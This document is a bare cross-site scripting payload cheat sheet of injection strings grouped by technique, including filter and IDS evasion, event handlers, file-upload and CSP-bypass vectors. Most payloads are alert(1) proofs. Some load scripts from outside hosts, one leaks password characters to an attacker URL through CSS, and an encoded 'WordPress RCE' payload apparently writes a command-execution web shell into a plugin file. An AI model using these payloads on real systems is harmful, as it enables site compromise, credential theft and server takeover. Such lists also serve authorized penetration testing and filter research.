XSS

'';!--"<XSS>=&{()}
'<script>alert(XSS)</script>
"<script>alert(XSS)</script>
'><script>alert(XSS)</script>
"><script>alert(XSS)</script>
<sCr<sCrIPt>iPt>alert(XSS)</sCr</sCrIPT>IpT>
"<sCr<sCrIPt>iPt>alert(XSS)</sCr</sCrIPT>IpT>
'<sCr<sCrIPt>iPt>alert(XSS)</sCr</sCrIPT>IpT>
"><sCr<sCrIPt>iPt>alert(XSS)</sCr</sCrIPT>IpT>
'><sCr<sCrIPt>iPt>alert(XSS)</sCr</sCrIPT>IpT>

HTML TAG Injection:
<svg onload=alert(1)>
"><svg onload=alert(1)//

HTML INLINE Injection:
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//

JAVASCRIPT CODE Injection:
'-alert(1)-'
'-alert(1)//
\'-alert(1)//

JAVASCRIPT TAG Injection:
</script><svg onload=alert(1)>

PHP_SELF Injection:
http://DOMAIN/PAGE.php/"><svg onload=alert(1)>
http://DOMAIN/PAGE.php/"><svg onload=alert`1`>
http://DOMAIN/PAGE.php/"><svg onload=alert&lpar;1&rpar;>
http://DOMAIN/PAGE.php/"><svg onload=alert&#x28;1&#x29>
http://DOMAIN/PAGE.php/"><svg onload=alert&#40;1&#41>

FILTER BYPASS:
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
	ENCODING
	%3Cx onxxx=1 
	<%78 onxxx=1 
	<x %6Fnxxx=1 
	<x o%6Exxx=1 
	<x on%78xx=1 
	<x onxxx%3D1
	MIXED CASE
	<X onxxx=1 
	<x OnXxx=1 
	<X OnXxx=1 
	Doubling 
	<x onxxx=1 onxxx=1
	SPACERS
	<x/onxxx=1 
	<x%09onxxx=1 
	<x%0Aonxxx=1 
	<x%0Conxxx=1 
	<x%0Donxxx=1 
	<x%2Fonxxx=1 
	QUOTES
	<x 1='1'onxxx=1 
	<x 1="1"onxxx=1
	STRIPPING
	<[S]x onx[S]xx=1
	[S] = stripped char or string
	MIMETISM
	<x </onxxx=1 
	<x 1=">" onxxx=1 
	<http://onxxx%3D1/
	
BODY TAGS:
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)

RANDOM VECTORS:
<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!

EVENT HANDLERS:
<x contenteditable onblur=alert(1)>lose focus! 
<x onclick=alert(1)>click this! 
<x oncopy=alert(1)>copy this! 
<x oncontextmenu=alert(1)>right click this! 
<x oncut=alert(1)>copy this! 
<x ondblclick=alert(1)>double click this! 
<x ondrag=alert(1)>drag this! 
<x contenteditable onfocus=alert(1)>focus this! 
<x contenteditable oninput=alert(1)>input here! 
<x contenteditable onkeydown=alert(1)>press any key! 
<x contenteditable onkeypress=alert(1)>press any key! 
<x contenteditable onkeyup=alert(1)>press any key! 
<x onmousedown=alert(1)>click this! 
<x onmousemove=alert(1)>hover this! 
<x onmouseout=alert(1)>hover this! 
<x onmouseover=alert(1)>hover this! 
<x onmouseup=alert(1)>click this! 
<x contenteditable onpaste=alert(1)>paste here!

CODE REUSE:
<script src=//TEST.com/1.js> 
<script src=//43574357645/1>

NO EVENT HANDLERS:
<script>alert(1)</script> 
<script src=javascript:alert(1)> 
<iframe src=javascript:alert(1)> 
<embed src=javascript:alert(1)> 
<a href=javascript:alert(1)>click 
<math><brute href=javascript:alert(1)>click 
<form action=javascript:alert(1)><input type=submit> 
<isindex action=javascript:alert(1) type=submit value=click> 
<form><button formaction=javascript:alert(1)>click 
<form><input formaction=javascript:alert(1) type=submit value=click> 
<form><input formaction=javascript:alert(1) type=image value=click> 
<form><input formaction=javascript:alert(1) type=image src=SOURCE> 
<isindex formaction=javascript:alert(1) type=submit value=click> 
<object data=javascript:alert(1)> 
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> 
<svg><script xlink:href=data:,alert(1) /> 
<math><brute xlink:href=javascript:alert(1)>click 
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

MOBILES:
<html ontouchstart=alert(1)> 
<html ontouchend=alert(1)> 
<html ontouchmove=alert(1)> 
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
<svg onload=alert(navigator.connection.type)> 
<svg onload=alert(navigator.battery.level)> 
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)>
<svg onload=navigator.vibrate(500)> 
<svg onload=navigator.vibrate([500,300,100])>

REGULAR XSS:
<iframe src=LOGOUT_URL onload=forms[0].submit()> 
</iframe><form method=post action=LOGIN_URL> 
<input name=USERNAME_PARAMETER_NAME value=USERNAME> 
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>

FILE UPLOAD:
Injection in Filename
"><img src=1 onerror=alert(1)>.gif
Injection in Metadata
$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg
Injection with SVG File
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

GOOGLE CHROME:
<script src="data:&comma;alert(1)// 
"><script src=data:&comma;alert(1)// 
<script src="//TEST.com&sol;1.js&num; 
"><script src=//TEST.com&sol;1.js&num; 
<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 
"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;

XHR REMOTE CALL:
<?php header(“Access-Control-Allow-Origin: *”); ?>
<img src=1 onerror=alert(1)>

SERVER LOG EVASION:
<svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1)>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>

WORDPRESS RCE:
<script/src="data:&comma;eval(atob(location.hash.slice(1)))//&num;
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
Qp4LnNlbmQoJCk=

http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD

UTF-8 ENCODE:
<IMG
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>

LONG UTF-8 ENCODE:
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

TAB TO BREAK UP XSS:
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

IMG FILTER EVASION:
<IMG SRC="   javascript:alert('XSS');">

IMG DYNSRC (IE):
<IMG DYNSRC="javascript:alert('XSS')">
<INPUT TYPE="image" DYNSRC="javascript:alert('XSS');">
<BGSOUND SRC="javascript:alert('XSS');">

VARIOUS SCRIPTS:
<br size="&{alert('XSS')}"> (netscape 4.x)
<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer> (netscape 4.x)
<IMG SRC='vbscript:msgbox("XSS")'> (vbsscript)
<IMG SRC="mocha:[code]"> (netscape)
<IMG SRC="livescript:[code]"> (netscape)
<b/alt="1"onmouseover=InputBox+1language=vbs>test</b> (VBSCRIPT)

XHTML TRICK:
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>

HTML5:
</a onmousemove="alert(1)">
<style>input[name=password][value*=a]{background:url('//attacker?log[]=a');}</style>
<iframe seamless src=”login.asp”/>

IDS EVASION:

alert('xss') -> better use -> prompt('xss')
<script> -> better use -> <ScRIPT x src=//ox.lv?
